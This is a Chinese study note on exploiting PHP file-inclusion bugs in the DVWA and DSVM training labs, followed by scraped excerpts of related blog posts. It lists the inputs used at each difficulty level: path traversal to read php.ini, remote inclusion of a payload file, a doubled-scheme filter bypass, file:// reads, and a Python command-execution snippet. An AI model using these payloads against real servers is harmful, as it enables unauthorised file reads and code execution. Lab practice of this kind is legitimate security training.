文件包含-笔记

以PHP为例 就可以使用 include     require 来进行文件包含操作。目的是引用其他的文件、代码。

当文件包含函数的参数用户可控是可以引用恶意代码。

DVWA_1.9此漏洞模块需要开启 allow_url_include功能。

PHPstudy开启功能位置:其他选项菜单-php扩展及设置-参数开关设置-allow_url_include勾选即可。

观察网页发现几个file1.php file2.php file3.php的URL区别仅为 page后跟的参数不同。

通过使用test.php 尝试后报错。可以发现服务器尝试查找test.php文件,此参数可控。另外报错爆出此页面的绝对路径。

LOW

使用 ../../php.ini 读取文件内容

使用  ../../phpinfo.php 执行相应php代码

使用  http://127.0.0.1/phpinfo.txt 执行远程代码文件

非php文件内包含php代码也可以执行

使用  http://127.0.0.1/phpinfo.php 代码在攻击者的web服务器上执行了 与我们的期望不服,所以

使用  http://127.0.0.1/phpinfo.txt才能达到我们想要的执行远程代码文件的目的。

medium.

..\..\php.ini 读取文件内容

hthttp://tp://127.0.0.1/phpinfo.txt  执行远程代码文件

high

发现 page只接受file开头的字符串作为参数。

使用file://本地文件传送协议即可绕过 读取本地文件

file:///C:\phpStudy\WWW\phpinfo.txt

由于file://无法读取远程文件所以需要配合文件上传漏洞来执行恶意代码

DSVM

注意DSVM系统是python编写的,远程文件包含的代码也必须是python的,不熟悉python代码的同学可以使用下面的示例:

import os

output = os.popen(‘ipconfig‘)

print output.read()

将其命名成cmd.txt

时间: 2024-10-04 02:13:24

文件包含-笔记的相关文章

文件包含学习笔记

文件包含分为远程包含,本地包含两种,主要是include,require等函数带来的包含漏洞例如我在本机PHPstudy上创建两个文件,include.php和text.txt,内容如下 //include.php <?php $i=$_GET['t']; include($i); ?> //text.txt <?php phpinfo(); ?> 然后访问网址http://127.0.0.1/include/include.php?t=text.txt 可以看到text.txt中

php学习笔记6--php中的文件包含 include,require,include_once,require_once

php中的文件包含 include,require,include_once,require_once 文件包含:是指将一个文件的内容包含进另外一个文件,有利于代码的复用等.php中文件包含指令有4个,分别为:include,include_once,require,require_once其中:include和require:使用一次便包含一次文件;而include_once和require_once则是:不管在一个脚本中包含另外一个脚本多少次,都只加载一次,不会重复,这样可以避免因一个文件的

前端PHP入门-018-内置函数之文件包含函数

在实际开发中,常常需要把程序中的公用代码放到一个文件中,使用这些代码的文件只需要包含这个文件即可.这种方法有助于提高代码的重用性,给代码的编写与维护带来很大的便利. 在PHP中, 有require.require_once.include.include- once四种方法包含一个文件. 函数 包含失败 特点 inlcude 返回一条警告 文件继续向下执行.通常用于动态包含 require 一个致命的错 代码就不会继续向下执行.通常包含极为重要的文件,整个代码甭想执行 include_once

PHP文件包含漏洞

php的函数引入文件是,由于传入的文件没有经过合理的校验,从而操作了预想之外的文件,就可以导致意外的文件泄露,甚至导致恶意代码的注入. 基本的代码: If($_GET['func']) { Include $_GET['func'] } Else { Include 'default.php' } 本意运行的是http://127.0.0.1/index.php?func=add.php,结果在后面默认运行了default.php 如果黑客运行自己上传的图片马,那么包含一句话木马,我们是不是就绕

shell脚本学习-文件包含

跟着RUNOOB网站的教程学习的笔记 和其他语言一样,shell也可以包含外部脚本.这样可以很方便的封装一些公用的代码作为一个独立的文件.shell文件包含的语法有两种形式 . filename  #也就是一个英文句号后面跟着想要包含的文件名,注意中间有一个空格分开 source filename 实验的时候遇到一个问题,第二种文件包含的形式在sh中不能用,而这两种文件包含形式在bash中是都可以使用的 实例 创建两个shell脚本文件 test1.sh代码如下: #!/bin/bash # a

跟bWAPP学WEB安全(PHP代码)--终结篇:文件目录遍历、文件上传、SSRF、CSRF、XXE、文件包含

前言 过年过的很不顺,家里领导和我本人接连生病,年前腊月29才都治好出院,大年初六家里的拉布拉多爱犬又因为细小医治无效离开了,没能过年回家,花了好多钱,狗狗还离世了.所以也就没什么心思更新博客.今天初七,正式上班了,更新一篇吧,把bWAPP中常见的web漏洞也就一次性更新完毕,完成这个系列,虽然有点虎头蛇尾,但是也颇感无奈了.去年立的flag也还有两个大系列没有完成,一个是互联网公司常见漏洞分析,一个是C语言基础自学笔记,要看的东西太多了,也就是借着努力学习工作来忘却生活的打击和痛苦吧. 文件和

本地文件包含被污染的SSH日志GetShell

0x01 前言 我们在渗透测试过程中常常会通过文件包含来getshell,一般会包含恶意代码的图片.污染UA或referer等HTTP头从而包含访问日志等等.这里介绍另外一种包含的方法,通过污染SSH日志的方式. 0x02 SSH日志污染 使用测试环境为ubuntu(10.168.33.174),ssh日志默认是在/var/log/auth.log下,默认其它用户是有read的权限的.然后我们直接执行ssh '<?php system($_GET[c]);?>'@10.168.33.174可以

c++ 头文件包含问题-include&amp;class

http://blog.csdn.net/jiajia4336/article/details/8996254 前向声明概念(forward declaration) 在程序中引入了类类型的B.在声明之后,定义之前,类B是一个不完全类型(incompete type),即已知B是一个类型,但不知道包含哪些成员.不完全类型只能以有限方式使用,不能定义该类型的对象,不完全类型只能用于定义指向该类型的指针及引用,或者用于声明(而不是定义)使用该类型作为形参类型或返回类型的函数. 前向声明应用场景 当你

文件包含漏洞

本实验是基于DVWA和sqli-labs的实验环境 实验平台搭建:下载Wamp集成环境,并下载DVWA和sqli-labs和压缩包解压至wamp\www的目录下.安装只要注意Wamp环境的数据库名和密码对应即可. 0x01:文件包含漏洞 服务器通过php的特性(函数)去包含任意文件时,由于要包含的这个文件来源过滤不严,从而可以去包含一个恶意文件,而我们可以构造这个恶意文件来达到邪恶的目的. 这也算官方的解释吧,用个人的话说,通过浏览器.url地址或者是一个参数的变量的内容,可以通过修改这些url